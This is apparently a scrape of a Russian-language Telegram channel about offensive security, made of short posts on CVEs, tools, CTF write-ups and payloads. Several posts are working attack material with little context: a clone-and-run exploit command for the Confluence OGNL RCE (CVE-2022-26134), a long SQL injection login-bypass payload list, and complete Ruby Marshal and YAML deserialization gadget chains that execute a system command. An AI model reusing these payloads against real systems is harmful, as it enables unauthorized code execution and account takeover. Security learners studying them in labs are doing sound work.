Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Осталось 8 подписчиков!❤️
🔥5
Поздравляю нас с преодолением первой тысячи подписчиков!!⚡️
🎉16👍2🔥2
Xakep - Очень плохая флешка.pdf
1.5 MB
Xakep - Очень плохая флешка. Разбираем атаку BadUSB в деталях

Об ата­ках BadUSB «Хакер» уже не­однократ­но писал. Сегод­ня мы раз­берем кон­крет­ный при­мер реали­зации такой ата­ки, под­робно опи­шем устрой­ство вре­донос­ной флеш­ки, при­ведем записан­ный на нее код и обсу­дим, как зас­тавить поль­зовате­ля Windows или Linux под­клю­чить ее к сво­ему компь­юте­ру.

#Xakep
🔥7
HTB Cheat Sheet.pdf
173.1 KB
HTB CheatSheet Labs

#HTB
3
CVE-2022-26134 Confluence Pre-Auth RCE via OGNL Injection

Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.

Использование:
git clone https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE.git
python3 confluence-exploit.py -u https://confluence.app

Rooted!

#CVE #POC
👍5
8
Похек
Photo
OSINT 14 февраля

44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
🌚4👍3
🧠 Awesome ChatGPT Prompts

Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.

В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.

Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!

#ChatGPT
🔥4
Legend
🐳4
CrackerJack

Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.

Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.

#tools
4
SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

#sqli
🐳6👍1💯1
This media is not supported in your browser
VIEW IN TELEGRAM
6
Forwarded from Monkey Hacker
Ruby Insecure Deserialization

# RU

В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.

Снизу вы можете найти PoC

# EN

In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.

At the bottom you can find the PoC


require 'base64'
Gem::SpecFetcher
Gem::Installer
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)


# RU

Более подробно можно узнать здесь

# EN

Learn more here

https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_ruby.html

https://bishopfox.com/blog/ruby-vulnerabilities-exploits


# RU

Есть еще тулза

# EN

There is also a tool

https://github.com/klezVirus/deser-ruby
👍6
CVE-2023-24055 PoC KeePass 2.5x

Злоумышленник, имеющий доступ на запись к конфигурационному файлу KeePass, может изменить его и внедрить вредоносные триггеры, например, для получения паролей в открытом виде путем добавления триггера экспорта.

#CVE
😱3
WAF глазами хакеров

Привет, Хабр! Сегодня мы поговорим об одном из современных механизмов защиты веб-приложений, а именно о WAF, Web Application Firewall. Мы расскажем, на чем основываются и как работают современные WAF, какие существуют способы обхода и bypass-техники, как их применять, а также почему ни в коем случае не стоит всецело полагаться на WAF. Мы представим свой взгляд пентестеров, которые никогда не принимали участие в разработке WAF и которые собирали информацию из открытых источников и на основе своего опыта, поэтому о некоторых тонкостях работы WAF мы можем даже и не подозревать.

#WAF
Доброго времени суток. Объявление для любителей CTF. В команду RedHazzarTeam требуются игроки, владеющие навыками решения задач по направлениям rev/pwn/crypto. Молодая динамически развивающаяся команда, с амбициозными планами. Входим в топ-20 команд в РФ. Основной критерий: владение базовыми навыками по указанным направлениям, активное участие в жизни коллектива, большое  желание развиваться в ИБ и помогать другим. По всем вопросам пишите в лс, буду рад пообщаться и ответить на Ваши вопросы.
(Контакт для связи: @Hazzarim139)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Monkey Hacker
Ruby Deserialization via YAML file

# RU

Тут не будет каких-то подробностей, считайте дополнение к прошлому посту

Сама команда выполняется в git_set
Т. е сам YAML файл выглядит так

# EN

There won't be any details, just consider it an addition to the previous post

The command itself is executed in git_set
That is, the YAML file itself looks like this


---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve


# RU

А содержимое ruby скрипта будет таким

# EN

And the contents of the ruby script will be

require "yaml"
YAML.load(File.read("payload.yml"))


# RU

И потом делаем

# EN

And then do

ruby deser.rb

# RU

Да там будут ошибки, однако наша команда будет выполняться.

# EN

Yes, there will be mistakes, but our command will be executed.


THX:

https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565

https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/

https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
👍5
THM WriteUP | Mustacchio

На Codeby вышла очередная моя статья, в этот раз прохождение лабы на TryHackMe.

Всем привет! Недавно начал писать прохождения различных тачек на TryHackMe на английском языке, теперь буду писать и на русском. В этот раз я буду решать Mustacchio. У него теги: XXE, PrivEsc.
Если вам будет интересен глубокий разбор XXE - фидбекайте в комментах и сделаю его!
🔥7